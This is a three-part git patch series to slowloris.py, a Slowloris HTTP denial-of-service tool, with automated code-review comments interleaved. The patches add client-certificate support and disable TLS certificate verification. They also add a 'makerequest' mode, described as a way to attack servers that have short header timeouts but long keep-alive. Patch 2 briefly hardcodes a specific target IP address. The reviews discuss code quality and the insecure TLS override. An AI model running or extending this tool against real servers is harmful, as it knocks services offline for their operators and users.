From f27c838ba43551d0f2d4ce23a2245ec54511d54c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Karol=20Celi=C5=84ski?=
Date: Fri, 30 Apr 2021 11:20:48 +0200
Subject: [PATCH 1/3] Now slowloris works with untrusted/invalid certificate.
---
slowloris.py | 2 ++
1 file changed, 2 insertions(+)
diff --git a/slowloris.py b/slowloris.py
index 554a503..2f07130 100755
--- a/slowloris.py
+++ b/slowloris.py
@@ -159,6 +159,8 @@ def init_socket(ip):
if args.https:
ctx = ssl.create_default_context()
+ ctx.check_hostname = False
+ ctx.verify_mode = ssl.CERT_NONE
s = ctx.wrap_socket(s, server_hostname=args.host)
s.connect((ip, args.port))
From b2b1bc639075731a9e3b319cb7825f46c8be6d3a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Karol=20Celi=C5=84ski?=
Date: Sat, 1 May 2021 00:46:41 +0200
Subject: [PATCH 2/3] Support for client certificate and full requests mode.
---
slowloris.py | 49 ++++++++++++++++++++++++++++++++++++++++++++-----
1 file changed, 44 insertions(+), 5 deletions(-)
diff --git a/slowloris.py b/slowloris.py
index 2f07130..22234bd 100755
--- a/slowloris.py
+++ b/slowloris.py
@@ -51,7 +51,28 @@
"--https",
dest="https",
action="store_true",
- help="Use HTTPS for the requests",
+ help="use https for the requests",
+)
+parser.add_argument(
+ "--cert",
+ help="Use SSL client certificate (PEM)",
+ default=None,
+)
+parser.add_argument(
+ "--key",
+ help="Use SSL client private key (PEM)",
+ default=None,
+)
+parser.add_argument(
+ "--password",
+ help="Password for private key",
+ default="",
+)
+parser.add_argument(
+ "--makerequest",
+ dest="makerequest",
+ action="store_true",
+ help="Send full http request",
)
parser.add_argument(
"--sleeptime",
@@ -75,6 +96,8 @@
parser.print_help()
sys.exit(1)
+
+
if args.useproxy:
# Tries to import to external "socks" library
# and monkey patches socket.socket to connect over
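Review bot: The two added lines `ctx.check_hostname = False` and `ctx.verify_mode = ssl.CERT_NONE` disable certificate and hostname verification for every HTTPS connection, not only the untrusted-certificate case the subject describes, so the defaults of the `ssl.create_default_context()` call one line earlier are discarded and any certificate presented to the client is accepted. Keep the default context as it is and apply the two overrides only behind an explicit opt-in (for example an `--insecure` store_true argument next to `--https`), emitting a `logging.warning(...)` when it is active so the verification downgrade is visible in the tool's own output. The `server_hostname=args.host` passed to `wrap_socket` is still needed for SNI with verification off and should stay. init_socket starts and ends outside the hunk.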
@@ -103,6 +126,13 @@
level=logging.INFO,
)
+if None not in [args.cert, args.key]:
+ if args.cert is None or args.key is None:
+ print("Supplu both parameters (--cert --key) for connection with client certificate !")
+ else:
+ logging.info("Using client certificate.")
+
+
def send_line(self, line):
line = f"{line}\r\n"
@@ -152,7 +182,6 @@ def send_header(self, name, value):
setattr(socket.socket, "send_line", send_line)
setattr(socket.socket, "send_header", send_header)
-
def init_socket(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
@@ -161,18 +190,22 @@ def init_socket(ip):
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
+ if None not in [args.cert, args.key]:
+ ctx.load_cert_chain(args.cert, args.key, args.password)
s = ctx.wrap_socket(s, server_hostname=args.host)
s.connect((ip, args.port))
- s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
+ s.send_line(f"GET / HTTP/1.1")
ua = user_agents[0]
if args.randuseragent:
ua = random.choice(user_agents)
s.send_header("User-Agent", ua)
- s.send_header("Accept-language", "en-US,en,q=0.5")
+ s.send_header("Host", args.host)
+ if args.makerequest:
+ s.send_line("\r\n\r\n")
return s
@@ -199,8 +232,14 @@ def main():
)
for s in list(list_of_sockets):
try:
+ if args.makerequest:
+ s.send("\r\n\r\n".encode("utf-8"))
+ s.send("GET / HTTP/1.1\r\n".encode("utf-8"))
+ s.send("Host: 34.118.77.60\r\n".encode("utf-8"))
s.send_header("X-a", random.randint(1, 5000))
- except socket.error:
+
+ except socket.error as e:
+ print(e)
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
From 0698fcf62ed8ba84b17a66017816bec1540c7265 Mon Sep 17 00:00:00 2001
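Review bot: The inner check `if args.cert is None or args.key is None:` in the new block at `@@ -103,6 +126,13 @@` can never be true, because the enclosing `if None not in [args.cert, args.key]:` already requires both values to be set; passing only `--cert` or only `--key` therefore prints nothing and the run continues without a client certificate, since the same `None not in` test gates `ctx.load_cert_chain` in init_socket later in this patch. Change the outer condition to `if args.cert is not None or args.key is not None:` and add `sys.exit(1)` after the `print(...)`, so a half-specified certificate pair is rejected rather than silently ignored; `sys` is already in use for `sys.exit(1)` after `parser.print_help()`. The later typo fix to the message in patch 3 (`@@ -128,7 +128,7 @@`) keeps this unreachable branch as it is.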
From: Karol Celinski
Date: Sat, 8 May 2021 19:56:21 +0200
Subject: [PATCH 3/3] Added SSL client certificate support and ability to attack servers with small request header/body timeout but big keep-alive
---
slowloris.py | 12 ++++++------
1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/slowloris.py b/slowloris.py
index 22234bd..4bafe42 100755
--- a/slowloris.py
+++ b/slowloris.py
@@ -72,7 +72,7 @@
"--makerequest",
dest="makerequest",
action="store_true",
- help="Send full http request",
+ help="Send full http request (useful when small request body/header timeout is set but keep-alive is set)",
)
parser.add_argument(
"--sleeptime",
@@ -128,7 +128,7 @@
if None not in [args.cert, args.key]:
if args.cert is None or args.key is None:
- print("Supplu both parameters (--cert --key) for connection with client certificate !")
+ print("Supply both parameters (--cert & --key) for connection with client certificate !")
else:
logging.info("Using client certificate.")
@@ -196,15 +196,16 @@ def init_socket(ip):
s.connect((ip, args.port))
- s.send_line(f"GET / HTTP/1.1")
+ s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
ua = user_agents[0]
if args.randuseragent:
ua = random.choice(user_agents)
s.send_header("User-Agent", ua)
- s.send_header("Host", args.host)
+ s.send_header("Accept-language", "en-US,en,q=0.5")
if args.makerequest:
+ s.send_header("Host", args.host)
s.send_line("\r\n\r\n")
return s
@@ -235,11 +236,10 @@ def main():
if args.makerequest:
s.send("\r\n\r\n".encode("utf-8"))
s.send("GET / HTTP/1.1\r\n".encode("utf-8"))
- s.send("Host: 34.118.77.60\r\n".encode("utf-8"))
+ s.send(f"Host: {args.host}\r\n".encode("utf-8"))
s.send_header("X-a", random.randint(1, 5000))
except socket.error as e:
- print(e)
list_of_sockets.remove(s)
for _ in range(socket_count - len(list_of_sockets)):
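Review bot: With `print(e)` removed in the `@@ -235,11 +236,10 @@` hunk, the `as e` on `except socket.error as e:` binds a name that is never read; write it as `except socket.error:`, which is also how the line read before patch 2. The raw `s.send(...)` calls kept in the `makerequest` branch bypass the `send_line`/`send_header` helpers that are attached to `socket.socket` via `setattr` and that init_socket uses for the same request line and `Host` header; `s.send_line("GET / HTTP/1.1")` and `s.send_header("Host", args.host)` would keep the two code paths consistent and drop the second hand-written f-string for the header. main starts and ends outside the hunk.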